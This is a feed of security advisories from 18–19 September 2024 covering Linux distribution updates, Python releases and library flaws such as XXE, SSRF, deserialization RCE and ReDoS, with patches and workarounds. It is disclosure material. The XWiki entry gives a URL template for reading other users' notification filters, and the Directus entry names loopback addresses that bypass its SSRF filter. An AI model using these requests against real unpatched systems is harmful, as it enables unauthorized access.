19.09.2024 17:51:59	suse	[SUSE-SU-2024:3344-1] Security update for kubernetes1.25 (important)	Security update for kubernetes1.25	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3344-1
19.09.2024 17:51:26	suse	[SUSE-SU-2024:3343-1] Security update for kubernetes1.24 (important)	Security update for kubernetes1.24	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3343-1
19.09.2024 17:51:06	suse	[SUSE-SU-2024:3342-1] Security update for kubernetes1.24 (important)	Security update for kubernetes1.24	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3342-1
19.09.2024 17:50:41	suse	[SUSE-SU-2024:3341-1] Security update for kubernetes1.23 (important)	Security update for kubernetes1.23	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3341-1
19.09.2024 17:49:42	maven	[MAVEN:GHSA-68J8-FP38-P48Q] Gematik Referenzvalidator has an XXE vulnerability that can lead to a Server Side Request Forgery attack (high)	### ImpactThe profile location routine in the referencevalidator commons package is vulnerable to [XML External Entities](https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)) attack due to insecure defaults of the used Woodstox WstxInputFactory. A malicious XML resource can lead to network requests issued by referencevalidator and thus to a [Server Side Request Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery) attack.The vulnerability impacts applications which use referencevalidator to process XML resources from untrusted sources. ### PatchesThe problem has been patched with the [2.5.1 version](https://github.com/gematik/app-referencevalidator/releases/tag/2.5.1) of the referencevalidator. Users are strongly recommended to update to this version or a more recent one. ### WorkaroundsA pre-processing or manual analysis of input XML resources on existence of DTD definitions or external entities can mitigate the problem.### References- [OWASP Top 10 XXE](https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)#)- [Server Side Request Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery)- [OWASP XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-68J8-FP38-P48Q
19.09.2024 17:49:20	maven	[MAVEN:GHSA-C459-2M73-67HJ] SOFA Hessian Remote Command Execution (RCE) Vulnerability (high)	### ImpactSOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components.### PatchesFixed this issue by update blacklist, users can upgrade to sofahessian version 3.5.5 to avoid this issue.### WorkaroundsYou can maintain a blacklist yourself in this directory `external/serialize.blacklist`.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C459-2M73-67HJ
19.09.2024 17:32:08	suse	[SUSE-SU-2024:3339-1] Security update for libmfx (moderate)	Security update for libmfx	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3339-1
19.09.2024 17:32:01	suse	[SUSE-SU-2024:3338-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3338-1
19.09.2024 17:30:41	suse	[SUSE-SU-2024:3337-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3337-1
19.09.2024 16:33:31	suse	[SUSE-SU-2024:3336-1] Security update for the Linux Kernel RT (Live Patch 13 for SLE 15 SP5) (important)	Security update for the Linux Kernel RT (Live Patch 13 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3336-1
19.09.2024 16:03:59	suse	[SUSE-SU-2024:3334-1] Security update for the Linux Kernel RT (Live Patch 14 for SLE 15 SP5) (important)	Security update for the Linux Kernel RT (Live Patch 14 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3334-1
19.09.2024 15:28:13	ubuntu	[USN-7025-1] LibreOffice vulnerability (high)	LibreOffice could accept fraudulent digital signatures.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7025-1
19.09.2024 14:47:13	cert	[VU:138043] A stack-based overflow vulnerability exists in the Microchip Advanced Software Framework (ASF) implementation of the tinydhcp server (critical)	### OverviewA stack-based overflow vulnerability exists in the tinydhcp server in the Microchip Advanced Software Framework (ASF) that can lead to remote code execution.### DescriptionAn implementation of DHCP in ASF fails input validation, thereby creating conditions for a stack-based overflow. The software is no longer supported by the vendor. Because this vulnerability is in IoT-centric code, it is likely to surface in many places in the wild.CVE-2024-7490There exists a vulnerability in all publicly available examples of the ASF codebase that allows for a specially crafted DHCP request to cause a stack-based overflow that could lead to remote code execution.### ImpactThis vulnerability can be tested by sending a single DHCP Request packet to a multicast address. This vulnerability exists in the current version of ASF 3.52.0.2574 and all previous versions of the software. There are also multiple forks of the tinydhcp software in github that are also potentially susceptible to this vulnerability.### SolutionThe CERT/CC is currently unaware of a practical solution to this problem other than replacing the tinydhcp service with another one that does not have the same issue.### AcknowledgementsThanks to the reporter Andrue Coombes of Amazon Element55. This document was written by Timur Snoke.	https://secdb.nttzen.cloud/security-advisory/cert/VU:138043
19.09.2024 12:11:49	suse	[SUSE-SU-2024:3333-1] Security update for wireshark (moderate)	Security update for wireshark	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3333-1
19.09.2024 12:11:19	suse	[SUSE-SU-2024:3332-1] Security update for ucode-intel (moderate)	Security update for ucode-intel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3332-1
19.09.2024 09:52:10	suse	[SUSE-SU-2024:3324-1] Security update for runc (low)	Security update for runc	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3324-1
19.09.2024 09:52:02	suse	[SUSE-SU-2024:3323-1] Security update for wireshark (moderate)	Security update for wireshark	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3323-1
19.09.2024 06:56:46	ubuntu	[USN-7023-1] Git vulnerabilities (critical)	Several security issues were fixed in Git.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7023-1
19.09.2024 05:31:53	fedora	[FEDORA-2024-1b36a483cc] Fedora 40: frr (high)	Fix for CVE-2024-44070	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1b36a483cc
19.09.2024 05:31:46	fedora	[FEDORA-2024-146ef211bc] Fedora 40: ruby (medium)	Upgrade to Ruby 3.3.5.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-146ef211bc
19.09.2024 04:59:16	fedora	[FEDORA-2024-1d4155bd39] Fedora 39: microcode_ctl (medium)	Update to upstream 2.1-45. 20240910Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode from revision 0x433 up to 0x434;Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode (in intel-ucode/06-9a-03) from revision 0x433 up to 0x434;Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode (in intel-ucode/06-9a-04) from revision 0x433 up to 0x434;Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode from revision 0x433 up to 0x434;Update of 06-aa-04/0xe6 (MTL-H/U C0) microcode from revision 0x1e up to 0x1f;Update of 06-b7-01/0x32 (RPL-S B0) microcode from revision 0x123 up to 0x129;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode from revision 0x4121 up to 0x4122;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;Update of 06-be-00/0x19 (ADL-N A0) microcode from revision 0x17 up to 0x1a (old pf 0x11).Addresses CVE-2024-23984, CVE-2024-24968Added the documentation directory to the list of files owned by the package	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1d4155bd39
19.09.2024 04:59:13	fedora	[FEDORA-2024-7dc0f381f1] Fedora 39: python3.6 (high)	Security fix for CVE-2024-6232 (rhbz#2310092)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7dc0f381f1
19.09.2024 04:59:12	fedora	[FEDORA-2024-39d459dd00] Fedora 39: python3.10 (high)	This is a security release of Python 3.10Note: The release you're looking at is Python 3.10.15, a security bugfix releasefor the legacy 3.10 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-39d459dd00
19.09.2024 03:18:37	fedora	[FEDORA-2024-d6726b5d75] Fedora 41: microcode_ctl (medium)	Update to upstream 2.1-45. 20240910Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode from revision 0x433 up to 0x434;Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode (in intel-ucode/06-9a-03) from revision 0x433 up to 0x434;Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode (in intel-ucode/06-9a-04) from revision 0x433 up to 0x434;Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode from revision 0x433 up to 0x434;Update of 06-aa-04/0xe6 (MTL-H/U C0) microcode from revision 0x1e up to 0x1f;Update of 06-b7-01/0x32 (RPL-S B0) microcode from revision 0x123 up to 0x129;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode from revision 0x4121 up to 0x4122;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;Update of 06-be-00/0x19 (ADL-N A0) microcode from revision 0x17 up to 0x1a (old pf 0x11).Addresses CVE-2024-23984, CVE-2024-24968Added the documentation directory to the list of files owned by the package	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d6726b5d75
19.09.2024 03:18:32	fedora	[FEDORA-2024-6def755315] Fedora 41: python3.12 (high)	This is the sixth maintenance release of Python 3.12Python 3.12 is the newest major release of the Python programming language, andit contains many new features and optimizations. 3.12.6 is the latestmaintenance release, containing about 90 bugfixes, build improvements anddocumentation changes since 3.12.5. This is an expedited release to address thefollowing security issues:gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6def755315
19.09.2024 03:18:31	fedora	[FEDORA-2024-091e2c7801] Fedora 41: python3.6 (high)	Security fix for CVE-2024-6232 (rhbz#2310092)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-091e2c7801
19.09.2024 03:18:31	fedora	[FEDORA-2024-2b163f9201] Fedora 41: python3.10 (high)	This is a security release of Python 3.10Note: The release you're looking at is Python 3.10.15, a security bugfix releasefor the legacy 3.10 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2b163f9201
19.09.2024 03:00:00	cisa	[CISA-2024:0919] CISA Adds One Known Exploited Vulnerability to Catalog (critical)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0919
19.09.2024 03:00:00	redhat	[RHSA-2024:6837] pcp security update (important)	Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: pmpost symlink attack allows escalating pcp to root user (CVE-2024-45770)* pcp: pmcd heap corruption through metric pmstore operations (CVE-2024-45769)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6837
19.09.2024 03:00:00	redhat	[RHSA-2024:6848] pcp security update (important)	Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: pmpost symlink attack allows escalating pcp to root user (CVE-2024-45770)* pcp: pmcd heap corruption through metric pmstore operations (CVE-2024-45769)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6848
19.09.2024 00:03:53	suse	[SUSE-SU-2024:3322-1] Security update for the Linux Kernel RT (Live Patch 1 for SLE 15 SP6) (important)	Security update for the Linux Kernel RT (Live Patch 1 for SLE 15 SP6)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3322-1
19.09.2024 00:03:47	suse	[SUSE-SU-2024:3321-1] Security update for the Linux Kernel RT (Live Patch 0 for SLE 15 SP6) (important)	Security update for the Linux Kernel RT (Live Patch 0 for SLE 15 SP6)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3321-1
19.09.2024 00:03:40	suse	[SUSE-SU-2024:3320-1] Security update for the Linux Kernel RT (Live Patch 15 for SLE 15 SP5) (important)	Security update for the Linux Kernel RT (Live Patch 15 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3320-1
18.09.2024 23:33:32	suse	[SUSE-SU-2024:3319-1] Security update for the Linux Kernel RT (Live Patch 16 for SLE 15 SP5) (important)	Security update for the Linux Kernel RT (Live Patch 16 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3319-1
18.09.2024 23:03:45	suse	[SUSE-SU-2024:3318-1] Security update for the Linux Kernel RT (Live Patch 11 for SLE 15 SP5) (important)	Security update for the Linux Kernel RT (Live Patch 11 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3318-1
18.09.2024 21:34:09	ubuntu	[USN-7022-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7022-1
18.09.2024 22:25:26	npm	[NPM:GHSA-68G8-C275-XF2M] Directus vulnerable to SSRF Loopback IP filter bypass (moderate)	### ImpactIf you're relying on blocking access to localhost using the default `0.0.0.0` filter this can be bypassed using other registered loopback devices (like `127.0.0.2` - `127.127.127.127`)### WorkaroundYou can block this bypass by manually adding the `127.0.0.0/8` CIDR range which will block access to any `127.X.X.X` ip instead of just `127.0.0.1`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-68G8-C275-XF2M
18.09.2024 19:21:05	ubuntu	[USN-7021-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-1
18.09.2024 22:22:56	npm	[NPM:GHSA-RRR8-F88R-H8Q6] find-my-way has a ReDoS vulnerability in multiparametric routes (high)	### ImpactA bad regular expression is generated any time you have two parameters within a single segment, when adding a `-` at the end, like `/:a-:b-`.### PatchesUpdate to find-my-way v8.2.2 or v9.0.1. or subsequent versions.### WorkaroundsNo known workarounds.### References- [CVE-2024-45296](https://github.com/advisories/GHSA-9wv6-86v2-598j)- [Detailed blog post about `path-to-regexp` vulnerability](https://blakeembrey.com/posts/2024-09-web-redos/)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RRR8-F88R-H8Q6
18.09.2024 18:01:54	ubuntu	[USN-7020-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7020-1
18.09.2024 22:23:24	maven	[MAVEN:GHSA-PG4M-3GP6-HW4W] org.xwiki.platform:xwiki-platform-notifications-ui leaks data of notification filters of users (moderate)	### ImpactIt's possible to get access to notification filters of any user by using a URL such as `<hostname>xwiki/bin/get/XWiki/Notifications/Code/NotificationFilterPreferenceLivetableResults?outputSyntax=plain&type=custom&user=<username>`. This vulnerability impacts all versions of XWiki since 13.2-rc-1.The filters do not provide much information (they mainly contain references which are public data in XWiki), though some info could be used in combination with other vulnerabilities.### PatchesThe vulnerability has been patched in XWiki 14.10.21, 15.5.5, 15.10.1, 16.0RC1. The patch consists in checking the rights of the user when sending the data.### WorkaroundsIt's possible to workaround the vulnerability by applying manually the patch: it's possible for an administrator to edit directly the document `XWiki.Notifications.Code.NotificationFilterPreferenceLivetableResults` to apply the same changes as in the patch. See c8c6545f9bde6f5aade994aa5b5903a67b5c2582.### References * Jira ticket: https://jira.xwiki.org/browse/XWIKI-20336 * Commit: c8c6545f9bde6f5aade994aa5b5903a67b5c2582### For more informationIf you have any questions or comments about this advisory:* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)* Email us at [Security Mailing List](mailto:security@xwiki.org)### AttributionThis vulnerability has been reported on Intigriti by [Mete](https://www.linkedin.com/in/metehan-kalkan-5a3201199).	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PG4M-3GP6-HW4W
18.09.2024 22:23:09	maven	[MAVEN:GHSA-R95W-889Q-X2GX] org.xwiki.platform:xwiki-platform-notifications-ui is missing checks for notification filter preferences editions (moderate)	### ImpactIt's possible for any user knowing the ID of a notification filter preference of another user, to enable/disable it or even delete it. The impact is that the target user might start loosing notifications on some pages because of this.This vulnerability is present in XWiki since 13.2-rc-1. ### PatchesThe vulnerability has been patched in XWiki 14.10.21, 15.5.5, 15.10.1, 16.0-rc-1. The patch consists in checking properly the rights of the user before performing any action on the filters. ### WorkaroundsIt's possible to fix manually the vulnerability by editing the document `XWiki.Notifications.Code.NotificationPreferenceService` to apply the changes performed in this commit e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4.### References * JIRA ticket: https://jira.xwiki.org/browse/XWIKI-20337 * Commit: e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4### For more informationIf you have any questions or comments about this advisory:* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)* Email us at [Security Mailing List](mailto:security@xwiki.org)### AttributionThis vulnerability has been reported on Intigriti by @floerer	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R95W-889Q-X2GX
18.09.2024 15:55:10	suse	[SUSE-SU-2024:3309-1] Security update for libmfx (moderate)	Security update for libmfx	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3309-1
18.09.2024 15:54:54	suse	[SUSE-SU-2024:3307-1] Security update for ucode-intel (moderate)	Security update for ucode-intel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3307-1
18.09.2024 15:54:46	suse	[SUSE-SU-2024:3306-1] Security update for clamav (important)	Security update for clamav	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3306-1
18.09.2024 15:53:47	suse	[SUSE-SU-2024:3305-1] Security update for clamav (important)	Security update for clamav	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3305-1
18.09.2024 15:52:47	suse	[SUSE-SU-2024:3304-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3304-1
18.09.2024 15:52:26	suse	[SUSE-SU-2024:3303-1] Security update for python312 (important)	Security update for python312	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3303-1
18.09.2024 15:52:07	suse	[SUSE-SU-2024:3302-1] Security update for python3 (important)	Security update for python3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3302-1
18.09.2024 15:51:40	suse	[SUSE-SU-2024:3301-1] Security update for ffmpeg-4 (important)	Security update for ffmpeg-4	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3301-1
18.09.2024 13:59:07	suse	[SUSE-SU-2024:3298-1] Security update for python-dnspython (moderate)	Security update for python-dnspython	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3298-1
18.09.2024 13:56:55	suse	[SUSE-SU-2024:3297-1] Security update for python-dnspython (moderate)	Security update for python-dnspython	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3297-1
18.09.2024 13:00:09	ubuntu	[USN-7019-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7019-1
18.09.2024 12:36:05	ubuntu	[USN-6885-3] Apache HTTP Server vulnerabilities (critical)	Several security issues were fixed in Apache HTTP Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6885-3
